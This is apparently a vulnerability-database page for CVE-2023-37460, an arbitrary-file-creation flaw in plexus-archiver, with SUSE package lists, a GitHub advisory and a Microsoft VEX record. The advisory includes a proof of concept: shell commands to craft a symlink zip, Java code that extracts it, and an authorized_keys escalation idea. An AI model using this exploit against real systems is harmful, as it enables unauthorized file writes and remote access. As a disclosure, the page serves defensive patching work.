"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP2:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-archiver-3.6.1-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"SUSE Manager Proxy 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"SUSE Manager Server Module 4.3:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:maven-archiver-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-archiver-javadoc-3.6.1-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-assembly-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-common-artifact-filters-javadoc-3.3.2-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-bootstrap-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-compiler-plugin-javadoc-3.11.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-analyzer-javadoc-1.13.2-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-plugin-javadoc-3.6.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-dependency-tree-javadoc-3.2.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-api-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-javadoc-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-plugin-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-enforcer-rules-3.4.1-150200.3.7.2.noarch",
"openSUSE Leap 15.5:maven-plugin-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-bootstrap-3.9.0-150200.3.7.1.noarch",
"openSUSE Leap 15.5:maven-plugin-plugin-javadoc-3.9.0-150200.3.7.5.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-annotations-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-api-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-generators-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-java-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-javadoc-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-plugin-tools-model-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-ant-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:maven-script-beanshell-3.9.0-150200.3.7.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:objectweb-asm-javadoc-9.6-150200.3.11.3.noarch",
"openSUSE Leap 15.5:plexus-archiver-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-archiver-javadoc-4.8.0-150200.3.7.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-extras-2.14.2-150200.3.9.2.noarch",
"openSUSE Leap 15.5:plexus-compiler-javadoc-2.14.2-150200.3.9.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-02-21T04:34:23Z",
"details": "important"
}
],
"title": "CVE-2023-37460"
}
]
}
GHSA-WH3P-FPHP-9H2M
Vulnerability from github – Published: 2023-07-25 17:20 – Updated: 2023-08-03 17:59
VLAI?
Summary
Arbitrary File Creation in AbstractUnArchiver
Details
Summary
Using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.
Description
When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry's content to the symlink's target.
Impact
Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.
Technical Details
protected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)
throws IOException, ArchiverException
{
...
// Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...
final File targetFileName = FileUtils.resolveFile( dir, entryName );
// Make sure that the resolved path of the extracted file doesn't escape the destination directory
// getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),
// because "/opt/directory".startsWith("/opt/dir") would return false negative.
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}
try
{
...
if ( !StringUtils.isEmpty( symlinkDestination ) )
{
SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );
}
else if ( isDirectory )
{
targetFileName.mkdirs();
}
else
{
try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )
{
IOUtil.copy( compressedInputStream, out );
}
}
targetFileName.setLastModified( entryDate.getTime() );
if ( !isIgnorePermissions() && mode != null && !isDirectory )
{
ArchiveEntryUtils.chmod( targetFileName, mode );
}
}
catch ( final FileNotFoundException ex )
{
getLogger().warn( "Unable to expand to file " + targetFileName.getPath() );
}
}
When given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link’s target will be created and the content of the archive’s entry will be written to it.
That’s because the way FileUtils.resolveFile() works:
public static File resolveFile( final File baseFile, String filename )
{
...
try
{
file = file.getCanonicalFile();
}
catch ( final IOException ioe )
{
// nop
}
return file;
}
File.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call JDK_Canonicalize():
JNIEXPORT int
JDK_Canonicalize(const char *orig, char *out, int len)
{
if (len < PATH_MAX) {
errno = EINVAL;
return -1;
}
if (strlen(orig) > PATH_MAX) {
errno = ENAMETOOLONG;
return -1;
}
/* First try realpath() on the entire path */
if (realpath(orig, out)) {
/* That worked, so return it */
collapse(out);
return 0;
} else {
/* Something's bogus in the original path, so remove names from the end
until either some subpath works or we run out of names */
...
realpath() returns the destination path for a symlink, if this destination exists. But if it doesn’t - it will return NULL and we will reach the else’s clause, which will eventually return the path of the symlink itself. So in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:
Path canonicalDirPath = dir.getCanonicalFile().toPath();
Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();
if ( !canonicalDestPath.startsWith( canonicalDirPath ) )
{
throw new ArchiverException( "Entry is outside of the target directory (" + entryName + ")" );
}
Later, the content of the entry will be written to the symbolic link’s destination and by doing so will create the destination file and fill it with the entry’s content.
Arbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim’s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker's public key will allow the attacker to connect the SSH server without knowing the victim’s password.
PoC
We created a zip as following:
$ ln -s /tmp/target entry1
$ echo -ne “content” > entry2
$ zip --symlinks archive.zip entry1 entry2
The following command will change the name of entry2 to entry1:
$ sed -i 's/entry2/entry1/' archive.zip
We put archive.zip in /tmp and create a dir for the extracted files:
$ cp archive.zip /tmp
$ mkdir /tmp/extracted_files
Next, we wrote a java code that opens archive.zip:
package com.example;
import java.io.File;
import org.codehaus.plexus.archiver.zip.ZipUnArchiver;
public class App
{
public static void main( String[] args )
{
ZipUnArchiver unArchiver = new ZipUnArchiver(new File("/tmp/archive.zip"));
unArchiver.setDestDirectory(new File("/tmp/extracted_files"));
unArchiver.extract();
}
}
After running this java code, we can see that /tmp/target contains the string “content”:
$ cat /tmp/target
content
Notice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.
Severity ?
8.1 (High)
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.codehaus.plexus:plexus-archiver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-37460"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-25T17:20:43Z",
"nvd_published_at": "2023-07-25T20:15:13Z",
"severity": "HIGH"
},
"details": "### Summary\n\nUsing AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution.\n\n### Description\nWhen extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the resolveFile() function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later Files.newOutputStream(), that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target.\n\n### Impact\nWhoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution.\n\n### Technical Details\n\nIn [AbstractUnArchiver.java](https://github.com/codehaus-plexus/plexus-archiver/blob/plexus-archiver-4.7.1/src/main/java/org/codehaus/plexus/archiver/AbstractUnArchiver.java#L342):\n```java\nprotected void extractFile( final File srcF, final File dir, final InputStream compressedInputStream, String entryName, final Date entryDate, final boolean isDirectory, final Integer mode, String symlinkDestination, final FileMapper[] fileMappers)\n throws IOException, ArchiverException\n {\n ...\n // Hmm. Symlinks re-evaluate back to the original file here. Unsure if this is a good thing...\n final File targetFileName = FileUtils.resolveFile( dir, entryName );\n\n\n // Make sure that the resolved path of the extracted file doesn\u0027t escape the destination directory\n // getCanonicalFile().toPath() is used instead of getCanonicalPath() (returns String),\n // because \"/opt/directory\".startsWith(\"/opt/dir\") would return false negative.\n Path canonicalDirPath = dir.getCanonicalFile().toPath();\n Path canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\n if ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n {\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n }\n\n\n try\n {\n ...\n if ( !StringUtils.isEmpty( symlinkDestination ) )\n {\n SymlinkUtils.createSymbolicLink( targetFileName, new File( symlinkDestination ) );\n }\n else if ( isDirectory )\n {\n targetFileName.mkdirs();\n }\n else\n {\n try ( OutputStream out = Files.newOutputStream( targetFileName.toPath() ) )\n {\n IOUtil.copy( compressedInputStream, out );\n }\n }\n\n\n targetFileName.setLastModified( entryDate.getTime() );\n\n\n if ( !isIgnorePermissions() \u0026\u0026 mode != null \u0026\u0026 !isDirectory )\n {\n ArchiveEntryUtils.chmod( targetFileName, mode );\n }\n }\n catch ( final FileNotFoundException ex )\n {\n getLogger().warn( \"Unable to expand to file \" + targetFileName.getPath() );\n }\n }\n```\nWhen given an entry that already exists in dir as a symbolic link whose target does not exist - the symbolic link\u2019s target will be created and the content of the archive\u2019s entry will be written to it.\n\nThat\u2019s because the way FileUtils.resolveFile() works:\n```java\npublic static File resolveFile( final File baseFile, String filename )\n {\n ...\n try\n {\n file = file.getCanonicalFile();\n }\n catch ( final IOException ioe )\n {\n // nop\n }\n\n\n return file;\n }\n```\nFile.getCanonicalFile() (tested with the most recent version of openjdk (22.2) on Unix) will eventually call [JDK_Canonicalize()](https://github.com/openjdk/jdk/blob/jdk-22%2B2/src/java.base/unix/native/libjava/canonicalize_md.c#LL48C1-L68C69):\n```cpp\nJNIEXPORT int\nJDK_Canonicalize(const char *orig, char *out, int len)\n{\n if (len \u003c PATH_MAX) {\n errno = EINVAL;\n return -1;\n }\n\n if (strlen(orig) \u003e PATH_MAX) {\n errno = ENAMETOOLONG;\n return -1;\n }\n\n /* First try realpath() on the entire path */\n if (realpath(orig, out)) {\n /* That worked, so return it */\n collapse(out);\n return 0;\n } else {\n /* Something\u0027s bogus in the original path, so remove names from the end\n until either some subpath works or we run out of names */\n ...\n```\nrealpath() returns the destination path for a symlink, if this destination exists. But if it doesn\u2019t - \nit will return NULL and we will reach the else\u2019s clause, which will eventually return the path of the symlink itself.\nSo in case the entry is already exists as a symbolic link to a non-existing file - file.getCanonicalFile() will return the absolute path of the symbolic link and this check will pass:\n```java\nPath canonicalDirPath = dir.getCanonicalFile().toPath();\nPath canonicalDestPath = targetFileName.getCanonicalFile().toPath();\n\n\nif ( !canonicalDestPath.startsWith( canonicalDirPath ) )\n{\n throw new ArchiverException( \"Entry is outside of the target directory (\" + entryName + \")\" );\n}\n```\nLater, the content of the entry will be written to the symbolic link\u2019s destination and by doing so will create the destination file and fill it with the entry\u2019s content.\n\nArbitrary file creation can lead to remote code execution. For example, if there is an SSH server on the victim\u2019s machine and ~/.ssh/authorized_keys does not exist - creating this file and filling it with an attacker\u0027s public key will allow the attacker to connect the SSH server without knowing the victim\u2019s password.\n\n### PoC\nWe created a zip as following:\n```bash\n$ ln -s /tmp/target entry1\n$ echo -ne \u201ccontent\u201d \u003e entry2\n$ zip --symlinks archive.zip entry1 entry2\n```\nThe following command will change the name of entry2 to entry1:\n```bash\n$ sed -i \u0027s/entry2/entry1/\u0027 archive.zip\n```\nWe put archive.zip in /tmp and create a dir for the extracted files:\n```bash\n$ cp archive.zip /tmp\n$ mkdir /tmp/extracted_files\n```\nNext, we wrote a java code that opens archive.zip:\n```java\npackage com.example;\n\nimport java.io.File;\n\nimport org.codehaus.plexus.archiver.zip.ZipUnArchiver;\n\npublic class App \n{\n public static void main( String[] args )\n {\n ZipUnArchiver unArchiver = new ZipUnArchiver(new File(\"/tmp/archive.zip\"));\n unArchiver.setDestDirectory(new File(\"/tmp/extracted_files\"));\n unArchiver.extract(); \n }\n}\n```\nAfter running this java code, we can see that /tmp/target contains the string \u201ccontent\u201d:\n```\n$ cat /tmp/target\ncontent\n```\nNotice that although we used here a duplicated entry name in the same archive, this attack can be performed also by two different archives - one that contains a symlink and another archive that contains a regular file with the same entry name as the symlink.",
"id": "GHSA-wh3p-fphp-9h2m",
"modified": "2023-08-03T17:59:29Z",
"published": "2023-07-25T17:20:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37460"
},
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"type": "PACKAGE",
"url": "https://github.com/codehaus-plexus/plexus-archiver"
},
{
"type": "WEB",
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Arbitrary File Creation in AbstractUnArchiver"
}
MSRC_CVE-2023-37460
Vulnerability from csaf_microsoft - Published: 2023-07-01 07:00 - Updated: 2024-06-30 07:00Summary
Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver
Notes
Additional Resources
To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer
The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2023-37460 Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2023/msrc_cve-2023-37460.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver",
"tracking": {
"current_release_date": "2024-06-30T07:00:00.000Z",
"generator": {
"date": "2025-10-20T00:33:55.075Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2023-37460",
"initial_release_date": "2023-07-01T07:00:00.000Z",
"revision_history": [
{
"date": "2023-07-31T00:00:00.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2024-06-30T07:00:00.000Z",
"legacy_version": "1.1",
"number": "2",
"summary": "Information published."
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
},
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003ccbl2 javapackages-bootstrap 1.5.0-4",
"product": {
"name": "\u003ccbl2 javapackages-bootstrap 1.5.0-4",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 javapackages-bootstrap 1.5.0-4",
"product": {
"name": "cbl2 javapackages-bootstrap 1.5.0-4",
"product_id": "18346"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 javapackages-bootstrap 1.5.0-4",
"product": {
"name": "\u003cazl3 javapackages-bootstrap 1.5.0-4",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 javapackages-bootstrap 1.5.0-4",
"product": {
"name": "azl3 javapackages-bootstrap 1.5.0-4",
"product_id": "18347"
}
}
],
"category": "product_name",
"name": "javapackages-bootstrap"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 javapackages-bootstrap 1.5.0-4 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 javapackages-bootstrap 1.5.0-4 as a component of CBL Mariner 2.0",
"product_id": "18346-17086"
},
"product_reference": "18346",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 javapackages-bootstrap 1.5.0-4 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 javapackages-bootstrap 1.5.0-4 as a component of Azure Linux 3.0",
"product_id": "18347-17084"
},
"product_reference": "18347",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"18346-17086",
"18347-17084"
],
"known_affected": [
"17086-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2023-37460 Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2023/msrc_cve-2023-37460.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2023-07-31T00:00:00.000Z",
"details": "1.5.0-4:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-2",
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"environmentalsScore": 0.0,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"temporalScore": 9.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"17086-2",
"17084-1"
]
}
],
"title": "Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…